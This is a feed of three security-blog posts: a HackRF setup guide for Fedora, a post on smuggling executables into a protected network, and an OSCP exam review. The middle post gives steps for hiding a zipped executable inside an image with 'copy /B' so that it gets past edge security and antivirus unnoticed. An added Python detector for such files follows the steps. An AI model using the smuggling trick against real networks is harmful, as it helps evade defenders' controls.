&lt;p&gt;Now wanting to get up and running with this device ASAP I followed the recommendation from Michael Ossmann &lt;a href=&quot;https://greatscottgadgets.com/sdr/1/&quot;&gt;https://greatscottgadgets.com/sdr/1/&lt;/a&gt; and downloaded Pentoo Linux. This distro with the disposable laptop that I had dedicated to radio caused ALL my frustration. First off new inexpensive laptops now all come with Windows 10 … I like to keep that around for convenience. So I shrunk the partition and started the install of Pentoo. Now this HP laptop has the WORST BIOS I have ever come across. The ability to enable legacy booting is there but it lacks the option to set priority between UEFI and Legacy. Solution: Troubleshooting reboot to UEFI device from Windows EVERY TIME, then crash the boot process with USB drive, then the BIOS will let you select an OS from the MBR … so bloody painful!&lt;/p&gt;

&lt;p&gt;Finally I am logged into Pentoo … no network … and video keeps crapping out. I felt like I was working on a linux system back in 1999 hunting for drivers. Let’s make this part of the story short shall we? After about 5 hours of messing with this crap Gentoo distro and not being able to get openGL running right I almost chucked the laptop across the room. Why spend all this time trying to make a piece of junk like Gentoo working when the time could be spent building a proper box with support for HackRF?&lt;/p&gt;

&lt;p&gt;ENTER Fedora 23, yes I would much rather run RedHat however I am too cheap to pay for a subscription. I could not believe how streamlined it is to get HackRF going in Fedora so I decided to write this to save others time and pain with a crappy ass Gentoo distro. Oh and did I mention that Fedora 23 has UEFI support? Makes everything so much nicer.&lt;/p&gt;

&lt;p&gt;This is not the officially recommended way to install gnuradio. I encountered issues with PyBOMBS and version numbers. This supposedly was fixed &lt;a href=&quot;https://github.com/gnuradio/pybombs/pull/246&quot;&gt;https://github.com/gnuradio/pybombs/pull/246&lt;/a&gt; although it didn’t work for me. I decided to go with dnf and see what I could do with the repositories and was pleasantly surprised.&lt;/p&gt;

&lt;p&gt;My recommendations for HackRF One:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;DON’T use Pentoo&lt;/li&gt;
  &lt;li&gt;The screenshots and build here were done on a VM; don’t do this. Load onto your hardware so that you can take advantage of the high USB speeds of the HackRF One&lt;/li&gt;
  &lt;li&gt;Install gqrx with Fedora. Not needed but very useful.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;build&quot;&gt;BUILD&lt;/h2&gt;

&lt;ol&gt;
  &lt;li&gt;Perform a normal installation of Fedora 23 Workstation&lt;/li&gt;
  &lt;li&gt;Open the CLI and run the following:
    &lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sudo dnf update
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;p&gt;&lt;img src=&quot;/assets/images/HRF/hrf-01.png&quot; alt=&quot;alt text&quot; title=&quot;hrf-01&quot; /&gt;&lt;/p&gt;
    &lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sudo dnf install kernel-devel-4.2.3-300.fc23.x86_64
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;p&gt;(Most likely not needed but I had to install to compile the VM additions)
&lt;img src=&quot;/assets/images/HRF/hrf-03.png&quot; alt=&quot;alt text&quot; title=&quot;hrf-03&quot; /&gt;&lt;/p&gt;
    &lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sudo dnf install gnuradio
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;p&gt;&lt;img src=&quot;/assets/images/HRF/hrf-04.png&quot; alt=&quot;alt text&quot; title=&quot;hrf-04&quot; /&gt;&lt;/p&gt;
    &lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sudo dnf install gr-osmosdr
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;p&gt;&lt;img src=&quot;/assets/images/HRF/hrf-05.png&quot; alt=&quot;alt text&quot; title=&quot;hrf-05&quot; /&gt;&lt;/p&gt;
    &lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;sudo dnf install gqrx
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;p&gt;&lt;img src=&quot;/assets/images/HRF/hrf-06.png&quot; alt=&quot;alt text&quot; title=&quot;hrf-06&quot; /&gt;&lt;/p&gt;
    &lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;hackrf_info
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;p&gt;(Used to check if all is good)&lt;br /&gt;
&lt;img src=&quot;/assets/images/HRF/hrf-07.png&quot; alt=&quot;alt text&quot; title=&quot;hrf-07&quot; /&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;You are done … yup that’s it. Way easier than Pentoo.
&lt;img src=&quot;/assets/images/HRF/hrf-08.png&quot; alt=&quot;alt text&quot; title=&quot;hrf-08&quot; /&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2 id=&quot;additional-reading&quot;&gt;Additional Reading&lt;/h2&gt;

&lt;p&gt;&lt;a href=&quot;http://www.amazon.com/The-Hobbyists-Guide-RTL-SDR-Software-ebook/dp/B00KCDF1QI&quot;&gt;The Hobbyist’s Guide to the RTL-SDR: Really Cheap Software Defined Radio&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;http://www.arrl.org/files/file/Technology/tis/info/pdf/020708qex013.pdf&quot;&gt;A Software-Defined Radio for the Masses, Part 1&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;http://www.eas.uccs.edu/~mwickert/ece4670/lecture_notes/Lab6.pdf&quot;&gt;ECE 4670 Spring 2014 Lab 6 Software Defined Radio and the RTL-SDR USB Dongle&lt;/a&gt;&lt;/p&gt;</content><author><name>RabbidByte</name></author><summary type="html">The Story Recently many different radio hacks (mousejack, drone hijacking) have hit the internet. This has spurred my interest in analogue and digital radio. After some binge shopping on the internet and a few days wait I have had some very nice toys show up. Once the new electronics smell and novelty of a new toy had worn off the frustration kicked in.</summary></entry><entry><title type="html">Transfer Any Binary into a Protected Network</title><link href="http://essentialexploit.com/Transfer-Any-Binary-into-a-Protected-Network.html" rel="alternate" type="text/html" title="Transfer Any Binary into a Protected Network" /><published>2013-06-24T07:00:00+00:00</published><updated>2013-06-24T07:00:00+00:00</updated><id>http://essentialexploit.com/Transfer-Any-Binary-into-a-Protected-Network</id><content type="html" xml:base="http://essentialexploit.com/Transfer-Any-Binary-into-a-Protected-Network.html">&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;/h2&gt;

&lt;p&gt;Well this is another old trick that still works today.  It still gets past all edge security and antivirus … well that is until you pull the executable out again.  I find myself using this trick when I need to bring penetration testing tools into a network.  Most of the time antivirus or edge security devices will stop the transfer of these executables.  So what can you do to get them in?&lt;/p&gt;

&lt;p&gt;The first is very obvious, just zip them up and encrypt them.  This will get the package into some networks but not all.  Many networks now configure edge devices and email security systems to block and/or alert on encrypted attachments.  This would probably blow your cover and game over.&lt;/p&gt;

&lt;p&gt;Another way to get executables into networks is by using a system called &lt;a href=&quot;https://github.com/RabbidByte/TransHex&quot; title=&quot;TransHex Download&quot;&gt;TransHex&lt;/a&gt; written while I was running essentialexploit.com.  As of now this has not been released but it will be very soon (&lt;em&gt;update&lt;/em&gt; TransHex is now released).  This application requires a web server on the internet that dynamically converts binary to hex and then gives you a text file that you can download.  Once you have the text file the TransHex client will put that back into a binary for you.&lt;/p&gt;

&lt;p&gt;The simplest way to get an executable into a network is to email it or just download it.  However as we mentioned earlier most edge devices will stop the download and alert the admins.  Not something that you want to have happen, however with a little prep you can hide any binary into another file and just bring it on into a network.  Here is how it works.&lt;/p&gt;

&lt;h2 id=&quot;how-to-do-it&quot;&gt;How To Do It&lt;/h2&gt;

&lt;p&gt;You must know beforehand which executables you want to send.  This is the downside.  If you forget about a program that you need, you will have to have access to the outside system again to send it.  Sometimes this could delay your penetration testing by quite a few hours, and sometimes it is not a problem at all.  So here’s what you do.&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;On an external windows system take a harmless picture file and your executable and drop them in the same folder so that it’s easy to work with them&lt;/li&gt;
  &lt;li&gt;Compress your executable (no encryption needed) into a zip file&lt;/li&gt;
  &lt;li&gt;Open up a windows command prompt&lt;/li&gt;
  &lt;li&gt;Navigate into the folder where your files are located&lt;/li&gt;
  &lt;li&gt;Run – copy /B [image file] + [zip file] [new image file]&lt;/li&gt;
  &lt;li&gt;Now there is a new file in your folder that looks exactly like your original image&lt;/li&gt;
  &lt;li&gt;This new file is the image file with the zip in binary appended to the end of the file&lt;/li&gt;
  &lt;li&gt;Now send this file into the protected network either by email, http … whatever&lt;/li&gt;
  &lt;li&gt;On the internal windows system open up 7zip&lt;/li&gt;
  &lt;li&gt;Under “File” select “open” and find your image file&lt;/li&gt;
  &lt;li&gt;Once 7zip opens the image … you see your package!  Extract it and away you go, but beware of local antivirus because once the exe is extracted it will most likely be scanned.&lt;/li&gt;
&lt;/ol&gt;
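&lt;p&gt;From the defender’s side the appended archive is easy to spot for exactly the reason 7zip can open it: a ZIP reader locates the end-of-central-directory record at the end of the file and works backwards, so any bytes sitting in front of the archive show up as a non-zero start offset. The following added Python (not part of the original post or of TransHex) performs that same check and reports where the archive begins and what it contains; the image and archive it tests are constructed in memory.&lt;/p&gt;

```python
"""Spot a ZIP archive appended to an image (the copy /B polyglot above).

Added example, not the post's own tooling or TransHex. 7zip opens the image
because a ZIP reader starts from the end-of-central-directory (EOCD) record;
the offsets stored there reveal where the archive really begins, and anything
in front of it is the carrier file. The same logic makes a cheap detector.
"""
import io
import struct
import zipfile
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8\xff"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
ZIP_CENTRAL_HEADER = b"PK\x01\x02"
ZIP_EOCD = b"PK\x05\x06"
EOCD_MIN_LEN = 22          # fixed part of the EOCD record
ZIP_COMMENT_MAX = 65535    # the EOCD may be followed by a comment this long


def carrier_type(data):
    """Best-effort label for the bytes in front of the archive."""
    if data.startswith(PNG_MAGIC):
        return "PNG"
    if data.startswith(JPEG_SOI):
        return "JPEG"
    return "unknown"


def find_appended_zip(data):
    """Return details of a ZIP that follows other data, or None.

    Looks for the EOCD record near the end, recovers the archive's true start
    from the central-directory size and offset, and only reports a hit when
    that start is past offset 0 and a local file header sits there.
    """
    eocd = data.rfind(ZIP_EOCD)
    tail = len(data) - eocd
    if eocd == -1 or tail not in range(EOCD_MIN_LEN, EOCD_MIN_LEN + ZIP_COMMENT_MAX + 1):
        return None
    cd_size = int.from_bytes(data[eocd + 12:eocd + 16], "little")
    cd_offset = int.from_bytes(data[eocd + 16:eocd + 20], "little")
    cd_pos = eocd - cd_size          # where the central directory really is
    zip_start = cd_pos - cd_offset   # stored offsets are relative to the zip start
    # zip_start == 0 is an ordinary archive; anything else means a prefix exists.
    if zip_start not in range(1, len(data)):
        return None
    if not data.startswith(ZIP_CENTRAL_HEADER, cd_pos):
        return None
    if not data.startswith(ZIP_LOCAL_HEADER, zip_start):
        return None
    with zipfile.ZipFile(io.BytesIO(data[zip_start:])) as zf:
        entries = zf.namelist()
    return {
        "carrier": carrier_type(data),
        "zip_offset": zip_start,
        "zip_size": len(data) - zip_start,
        "entries": entries,
    }


def make_png_1x1():
    """Constructed 1x1 grey PNG so the sample runs offline (not a real asset)."""
    def chunk(ctype, payload):
        body = ctype + payload
        return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body))
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit greyscale
    idat = zlib.compress(b"\x00\x80")                    # filter byte + one pixel
    return PNG_MAGIC + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def make_zip(files):
    """Constructed archive from {name: bytes}, deflated, as a zip tool writes it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    image = make_png_1x1()
    archive = make_zip({"tool.txt": b"stand-in for the packed executable"})
    polyglot = image + archive       # what the copy /B step produces
    print(find_appended_zip(polyglot))
    print(find_appended_zip(image))  # None: a clean image
```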

&lt;h2 id=&quot;images-from-testing&quot;&gt;Images From Testing&lt;/h2&gt;
&lt;p&gt;The command&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/transhex/command.png&quot; alt=&quot;alt text&quot; title=&quot;The Command&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The files&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/transhex/file_listing.png&quot; alt=&quot;alt text&quot; title=&quot;The Files&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Scan the attachment (just to show that it was malicious)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/transhex/scan-1.png&quot; alt=&quot;alt text&quot; title=&quot;Scan 1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Scan the malicious image&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/transhex/scan-2.png&quot; alt=&quot;alt text&quot; title=&quot;Scan 2&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Extracting the package from the image&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/transhex/zip.png&quot; alt=&quot;alt text&quot; title=&quot;Zip&quot; /&gt;&lt;/p&gt;</content><author><name>RabbidByte</name></author><summary type="html">Summary</summary></entry><entry><title type="html">Offensive Security PWB (OSCP) - A Review</title><link href="http://essentialexploit.com/PWB-OSCP.html" rel="alternate" type="text/html" title="Offensive Security PWB (OSCP) - A Review" /><published>2013-05-29T07:00:00+00:00</published><updated>2013-05-29T07:00:00+00:00</updated><id>http://essentialexploit.com/PWB-OSCP</id><content type="html" xml:base="http://essentialexploit.com/PWB-OSCP.html">&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;/h2&gt;
&lt;h3 id=&quot;reposted-from-another-one-of-my-blogs&quot;&gt;Reposted from another one of my blogs&lt;/h3&gt;

&lt;p&gt;Let’s start off on the right foot shall we?  I don’t want to be rude but – I am a computer geek, my writing skills are not so great.  So if you don’t like the way I write just quit reading.  So let’s get on with the story shall we?&lt;/p&gt;

&lt;p&gt;2013 was just starting and every year I have the opportunity to request training from my employer so I went out in search for a challenge.  In 2012 I received the CISSP certification and after reading all the horror stories about the exam on the internet I was not impressed.  For someone with a diverse technical background the CISSP was “Mickey Mouse” and pretty much a cake walk.  Don’t get me wrong I am quite proud to call myself a CISSP but I wanted a challenge … something that didn’t just take time and effort, but something that would drag my mind through hell.  I found this challenge in the form of the Offensive Security PWB course and OSCP challenge.&lt;/p&gt;

&lt;h2 id=&quot;in-the-beginning&quot;&gt;In The Beginning&lt;/h2&gt;

&lt;p&gt;Once I decided that the PWB course was my training for the year I had to research the training, Offensive Security, and write a proposal so that the funds for the course could be approved.  Offensive Security was no stranger to me; I have been using BackTrack since the days of version 2 and it has been my Linux distro of choice for pentesting ever since (Kali has since been released).  Any group that could put out a distribution like BackTrack definitely could teach me something.&lt;/p&gt;

&lt;p&gt;The PWB course on the other hand was more difficult to put into terms for management.  Going through review after review of the training and challenge I found terms like “sleep deprived”, “frustrated”, and “hellish” repeated over and over again.  I thought they were all over exaggerating and it was the same story as the CISSP.  Wow was I ever wrong.&lt;/p&gt;

&lt;p&gt;So the proposal was written, funds were approved, and I wasted no time to sign right up and get started.  The registration and payment process I remember was quite odd and did not flow very well.  Offensive Security does not use fancy web pages for account creation, management, and credit card processing.  Why?  Obvious I thought, why expose that type of thing to the internet with a static URL if you don’t need to.  I thought that it was a very smart move, but still I was frustrated a bit going through the process.&lt;/p&gt;

&lt;p&gt;Then the material showed up.  Excitement rushed through me and I dug in right away.  The table of contents in the pdf gave me the impression that it wasn’t going to be that hard.  I know my programming skills are far from good, but hey how hard could this really be?&lt;/p&gt;

&lt;p&gt;I read through the lab guide and watched all the videos.  The quality in the material was definitely there.  For the cost of the course at this point I was thinking that the labs had to be a joke.  I had pretty much already got my money’s worth out of the training, considering that other similar courses cost 2 times as much or even more.&lt;/p&gt;

&lt;h2 id=&quot;the-lab&quot;&gt;The Lab&lt;/h2&gt;

&lt;p&gt;Back to the beginning of the guide I went to start working through the exercises, attacking boxes, and recording findings.  The VPN to the lab is amazing, the high speeds and reliability couldn’t have been better.  However, other students reverting boxes on you when you’re just about to crack a system was quite frustrating.&lt;/p&gt;

&lt;p&gt;My first sweep of the lab … This can’t be right.  Ping sweep again.   Holy crap, this lab is huge! The first part of the lab had 35 machines waiting to be attacked!  And this was only 1 of 4 networks in the lab.  I couldn’t believe it, I definitely had my work cut out for me.  Later on I found that the other networks were smaller consisting of 4 – 10 machines each.  Offensive Security definitely did an outstanding job creating this hacking utopia.&lt;/p&gt;

&lt;p&gt;Boxes started to fall left and right.  I am pretty good at this I thought.  Metasploit here, MS06-086 there, and a quick meterpreter “getsystem” (my biggest mistake and regret).  Easy.  Maybe this isn’t going to be such a challenge.  Well that was the beginning, the low hanging fruit quickly fell and the frustration set in.  Some boxes just were not going down without a fight.  2 days passed without rooting another box … then another 3 days.  What am I doing wrong I thought.  I needed help.&lt;/p&gt;

&lt;p&gt;IRC (haven’t used it in so long but it was good to be back) communication to Offensive Security staff is provided with the PWB course so I thought that now would be a great time to try it out.  Needless to say you know where this is going if this isn’t the first PWB review you’ve read.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Me &amp;gt; ping op
[some op] &amp;gt; pong Me
**go into private messaging**
Me &amp;gt; am I doing something wrong?  I have tried every exploit on [insert any machine name here] and nothing is working.  Can you help me?
[some op] &amp;gt; try harder
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;WTF!? really, no shit.  Well if that ain’t just a kick in the ass.  Makes your frustration level go straight through the roof!  You cave, admit that you need help, you go ask for it and you get “try harder”.  This was the first time I got this response and definitely it was not the last.  Why would “teachers” do this to a person I thought.  Well I learnt through the “try harder” process that it is the best way to learn.  Don’t get me wrong it’s also the most frustrating way to learn.&lt;/p&gt;

&lt;p&gt;Let’s put it this way.  You want to learn how to do something.  So you go ask your buddy to teach you.  He/she shows you exactly step by step how to accomplish the task.  Great, you know how to do it.  Now don’t perform that task for a year, do you still remember how to do it?  With the “try harder” approach, lessons that you learn through frustration, tears, and pure agony stay with you.  I will NEVER forget the lessons that I learnt through Bob, Carrie, and that stupid freakn’ OTRS box.  So basically try harder = An op not trying to piss you off, but helping you to learn the lesson, not the solution.&lt;/p&gt;

&lt;h2 id=&quot;the-united-students-of-offsec&quot;&gt;The United Students of Offsec&lt;/h2&gt;

&lt;p&gt;As much as try harder was working for me it didn’t solve all my issues and I was quickly seeing my 90 days of lab time run out.  Who can help me out?  My friends and co-workers either don’t have the time or knowledge to help me.  Crap!  I can foresee myself not completing the lab.  Wait this is 2013, communication globally has never been easier.  Off to Twitter I went and basically sent out a distress signal with some hash tags and prayed for a response.  I also responded to another student’s distress signal.&lt;/p&gt;

&lt;p&gt;I quickly found out that my feelings of hopelessness were shared amongst others within the PWB community.  Emails started flying back and forth and information was being shared.  Don’t misunderstand this.  We were sharing information not giving answers away.  At this point we were all trained in the “try harder” methodology and were not about to break it.  You work extremely hard to get some boxes and you just aren’t about to give it away.&lt;/p&gt;

&lt;p&gt;We the students were united in our common goal to take down every single system in the lab.&lt;/p&gt;

&lt;p&gt;Along with IRC Offensive Security also provides students access to an online forum.  These forums are full of great info.  You know the normal stuff “Bob is laughing at you”, “try harder”, and then the helpful information.  However being regulated by Offensive Security I don’t think that you will find any good hints or solutions to the labs in there.  Again it’s about learning the lesson and not achieving the goal.&lt;/p&gt;

&lt;p&gt;Lab time was coming to an end and I had my challenge already booked.  Just a few days left and I decided to quit working in the lab and get the lab report completed.  I felt horrible.  I was unable to get Pain, Sufferance, and Jack (in the admin lab).  What a ride, and it wasn’t over yet.  With the challenge that weekend I couldn’t waste time worrying about what I didn’t do.  Over the 90 days I learnt a lot and achieved quite a bit.&lt;/p&gt;

&lt;h2 id=&quot;the-challenge&quot;&gt;The Challenge&lt;/h2&gt;

&lt;p&gt;The OSCP challenge is a 24 hour test of what you have learnt.  You are given access to a new lab that the student has no previous knowledge of and they are challenged to gain administrative access to the 5 machines in 24 hours.  Machines are rated at different point levels and points are gained when access is obtained by the student.  To pass the challenge a total of 70 points must be achieved out of a possible 100.  When the 24 hours is up the student then has another 24 hours to write the report in the format of a pentest report and submit it to Offensive Security.  Oh and there is one catch … remember way back at the beginning of this write up my biggest mistake and regret in the lab?  You guessed it.  You can’t use metasploit in the challenge (with some exceptions, it is laid out quite nicely in the challenge package).&lt;/p&gt;

&lt;p&gt;7:00 AM on Saturday May 4th 2013 I am sitting at my desk waiting for my exam package.  Nothing.  7:05 .. 7:15 still nothing.  What the hell?  Yeah so long story short I screwed up with the time zones and booked my exam for 8:00 AM.  Even worse I did this again scheduling the next exam as well.&lt;/p&gt;

&lt;p&gt;Finally I get the exam package and I am off to the races.  I had no plan, no schedule, and no idea what I was going to do.  Worst battle plan ever.  So yeah let’s sum up this challenge attempt as WTF Why Did I Show Up?&lt;/p&gt;

&lt;p&gt;I worked from 8AM to midnight straight with no breaks.  Then I gave up.  I was beat, and there was nothing else left in me.  Only one box rooted and 2 limited shells.  I knew right away there was no possible way I passed.  I went home defeated, feeling like crap … a failure.  I whimpered to myself a little before I went to bed and then raised the white surrender flag.  I had no intention to wake up and try any more.&lt;/p&gt;

&lt;p&gt;Family and friends were needed to pick me up the next day.  Words of encouragement and long talks convinced me that I could do this.  Really this is the challenge that I was originally looking for.  Now I have found that challenge and I am going to quit because it’s not easy?  Hell no.  I wrote up the lame pentest report and sent it off to Offensive Security.  2 days later that dreaded “you failed” email came.  I knew it was coming but man did it ever hurt.  Someone else out there knows how poorly I did.  Ouch.  Funny thing is I found out that you can’t rebook your challenge until you get that rejection email.  Wonder if I was the first one to try and reschedule before finding out for sure if they failed?&lt;/p&gt;

&lt;p&gt;I rescheduled for the soonest weekend that fit into my schedule.  I did this for one main reason.  It kept me extremely focused and made me get over the failure very quickly.  Hell who’s got time to feel sorry for themselves when you got to do the challenge again?  Offensive Security is very kind and has priced the challenge retake very low.  Thank you, because this one I had to pay for myself.  Again together with other PWB students a plan was formed, code was compiled and a strategy was formed.&lt;/p&gt;

&lt;p&gt;Over the next 2-3 weeks many test machines were created, and exploited.  I had figured from other reviews on the internet that I was not going to face the same challenge as the first time so I’d better be ready.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Linux and Windows Privilege Escalation “Libraries” were built&lt;/li&gt;
  &lt;li&gt;A detailed 24 hour plan was created with structured breaks and machine rotation
    &lt;ul&gt;
      &lt;li&gt;First 3 hours were reconnaissance&lt;/li&gt;
      &lt;li&gt;Then 1.5 hours per machine in a rotation&lt;/li&gt;
      &lt;li&gt;Whiteboard was prepped to keep notes on important machine details like OS and kernel ver.&lt;/li&gt;
      &lt;li&gt;A list of questions was made to help me think when I got stuck on machines&lt;/li&gt;
      &lt;li&gt;A very detailed procedure was created with commands for recon work.&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Saturday May 25th, 2013 – 7:00 AM …. I screwed up the time zone thing again.  Wait until 8:00 AM.  The exam package came in.  A huge break the “buffer overflow” box was repeated in this challenge.  This was the only box I rooted in the previous attempt.  Thank the gods I haven’t even started typing and I know I have 25 points.&lt;/p&gt;

&lt;p&gt;I followed my plan.  Recon work, then break, did the buffer overflow box.  Bingo! 25 points, only 45 more needed and I am only 3 hours in.  Then limited shells on 2 boxes.  When I stopped for my lunch break (away from my computer) I was feeling good.  I should have this done in time to get to bed at a decent time.&lt;/p&gt;

&lt;p&gt;After my lunch I hit a wall.  Nothing was working and I just couldn’t make progress.  Then at around 5:30 PM I got another box!  That really picked me up and I was starting to feel energized again.  But no more progress was made, I broke my schedule and skipped my dinner break … oh no, things were starting to fall apart and failure was looking like a reality again.&lt;/p&gt;

&lt;p&gt;10:00 PM I went home I was going to sleep until 2:00 AM and get back at it.  However I was still wide awake at 10:45 PM … I wasn’t going to sleep.  Back to the office I went.  Crazy good luck ensued and by 2:00 AM I had another box and another limited shell.  However that was all that I was to get that night.  6:00 AM I went back home and slept … for a whopping 2 hours when I was woken by a phone call.  So back to the office, I was awake anyway and I needed to write that report.&lt;/p&gt;

&lt;p&gt;I looked at what I had done and with access to the challenge lab cut off I could do no more work.  Am I gonna make it?  I knew I had a solid amount of points but how does Offensive Security give partial points, and will the report be good enough to get all of the points for the work I did?  I wrote the report and put as much detail in it as I could.  I was even thinking of attaching some kind of bribe to the report.  Is there a way to attach a couple hundred “pay pal” bucks to a pdf?  Well either way I packaged it all up (no bribe included), said a little prayer and hit send.&lt;/p&gt;

&lt;p&gt;I waited … waited … and even though the reply came in just over 24 hours, it felt like an eternity.  Then 3 minutes before I was to leave work for the day I got the email.  Holy crap I passed!  My eyes started tearing up a little and I was ecstatic!  I learnt the lessons, I fought a good fight, I didn’t make it by a lot I know … but the point was I made it.  I wanted the challenge, it was presented to me, and I had risen up and proved myself.&lt;/p&gt;

&lt;p&gt;Once a student has passed the challenge they are given access to a new area in the forum where discussing the challenge is permitted.  I looked up where I fell short immediately.  Go figure the first box I didn’t get … I had that exploit already compiled in my library … what the hell?  So I went back to my notes and somehow I didn’t try it.  Another reason to make a detailed attack strategy with a sequence to follow.  The second box I missed well let’s just say I want to kick my own ass for not getting that.  So obvious that I completely ignored it thinking that they wouldn’t make it that easy.   So the interesting thing is the points that I missed were not due to lack of knowledge but because I did not follow a strict procedure to gain access.&lt;/p&gt;

&lt;p&gt;I now hold the OSCP certification and I hold it above all other certs.  I put in close to 400 hours of my time into this course, broke 2 keyboards in frustration, and almost lost one LCD.  It is not that this cert means more than the others, it is because this cert was truly earned.  I worked hard for this one and in the process learnt a lot about pen testing, exploitation, and myself.  It is an experience that I will never forget.&lt;/p&gt;

&lt;h2 id=&quot;what-students-should-know&quot;&gt;What Students Should Know&lt;/h2&gt;

&lt;p&gt;From my entire experience here is what I wish I found on the net before I started.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;When in the labs use metasploit, but every time you do make sure you can exploit the machine by hand as well&lt;/li&gt;
  &lt;li&gt;Do every extra mile exercise, they really do help you learn the material&lt;/li&gt;
  &lt;li&gt;Play in the Offsec lab’s hacking utopia as long as you can and have fun with it at the same time&lt;/li&gt;
  &lt;li&gt;Reach out to other students.  Peer support is worth so much.  To the guys that supported me thank you!  I couldn’t have done it without you.&lt;/li&gt;
  &lt;li&gt;When working through the lab keep all exploits you have used on your local machine, neatly organized, and leave yourself readme files of where you found the exploit and which systems it will work on&lt;/li&gt;
  &lt;li&gt;Even though enumeration isn’t as fun and exciting as exploitation PRACTICE it and have good notes.  The challenge is pretty much built to fail you if you don’t have good enumeration techniques&lt;/li&gt;
  &lt;li&gt;Go into the challenge with a solid attack strategy&lt;/li&gt;
  &lt;li&gt;Make lists and notes to keep yourself on track in the challenge&lt;/li&gt;
  &lt;li&gt;If you are working from a virtual machine, take snapshots of it … you never know when it will break&lt;/li&gt;
  &lt;li&gt;Don’t update metasploit when connected to the labs … for some reason it seems to really break it.  This happened to myself and one other student that I talked with&lt;/li&gt;
  &lt;li&gt;If you are married or are in a relationship you better hope they are understanding or you will be single by the end.  A big thanks to my wife, family, and friends who helped me through this!&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;what-employers-need-to-know&quot;&gt;What Employers Need To Know&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;The OSCP certification is hard to get.&lt;/li&gt;
  &lt;li&gt;If you are looking for a technical security guy/gal or pen tester, look for an OSCP.  If you are looking for a policy writer or manager then get a CISSP.&lt;/li&gt;
  &lt;li&gt;OSCP holders have proven that they have a solid understanding of penetration testing and computer security on multiple platforms&lt;/li&gt;
  &lt;li&gt;From my experience and what I have read an OSCP will be more technical and have a better understanding of penetration testing than a CEH (my opinion only)&lt;/li&gt;
  &lt;li&gt;The OSCP is one of a handful of certifications that is achieved through hands on scenario testing rather than multiple choice.  You can guess a, b, c, or d and have a 25% chance of getting it right.  In lab scenarios there is no guessing.&lt;/li&gt;
  &lt;li&gt;For the most part I think students that have gone through the PWB course and achieved the OSCP certification show dedication and exceptional work ethic (again my opinion only) or they are truly gifted and just breezed through it&lt;/li&gt;
  &lt;li&gt;For everyone who thinks IT Certification is a joke and not worthwhile – re-evaluate VPN scenario based testing.  I see this as the future testing standard for all IT certifications.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So what’s next?  Well that OSCE is looking pretty tough and I still have some hair left to pull out …&lt;/p&gt;</content><author><name>RabbidByte</name></author><summary type="html">Summary Reposted from another one of my blogs</summary></entry></feed>